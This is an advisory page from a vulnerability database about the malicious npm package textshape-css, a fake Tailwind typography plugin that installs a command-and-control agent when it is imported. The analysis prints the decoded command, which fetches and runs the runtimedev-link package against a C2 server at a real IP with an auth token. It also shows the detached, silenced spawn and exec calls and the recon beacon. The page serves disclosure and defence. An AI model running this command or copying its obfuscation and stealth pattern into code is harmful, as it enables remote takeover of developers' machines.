VDB

GCVE-110-OSM-2026-6426

GCVE-110-OSM-2026-6426
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 21, 2026
Installs a C2 agent at require-time on any host importing textshape-css@1.0.0, a Tailwind CSS typography plugin impersonator. A char-code-array-obfuscated IIFE (_.y()) in src/index.js reconstructs a command that downloads and executes the attacker-controlled runtimedev-link npm package via npx, which connects to C2 at http://194.11.226.41:4000 (3/91 VT detections, Rockhoster Private Limited, GB) using an embedded auth token. The process is fully detached and silenced (nohup/>/dev/null on Unix; windowsHide on Windows). A secondary styles.js IIFE writes system recon to tmpdir and beacons a campaign-linked npm package, linking textshape-css to the tailwind-typography-plus cluster via identical styles.js/utils.js file hashes. Trigger: require-time IIFE (_.y()) at the bottom of src/index.js (no install scripts). All command strings are char-code-array-encoded and decoded with String.fromCodePoint at call time. Decoded command runs npx -y runtimedev-link@latest connecting to http://194.11.226.41:4000 with auth token zRlY7_JxvFY8_Zhhu8ih24iW_dT5Rb_9. On Windows: child_process.exec({windowsHide:true}).unref(). On Unix: child_process.spawn('/bin/sh',['-c','nohup <cmd> >/dev/null 2>&1 &'],{detached:true,stdio:'ignore'}).unref(). runtimedev-link (8 published versions, publisher: nathan.jin.dev@gmail.com) functions as the C2 agent connecting back to 194.11.226.41 port 4000. Secondary IIFE in styles.js (file hash identical to tailwind-typography-plus@2.1.0) collects process.arch/platform/execPath, writes recon JSON to os.tmpdir()/.tailwind-color-space-v2/probe-<pid>.json, and beacons the tailstyle-core npm package endpoint.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowntextshape-cssall versions (affected)

References

vendor

Browse GCVE Records

73,738 records in the GCVE database · Updated July 19, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›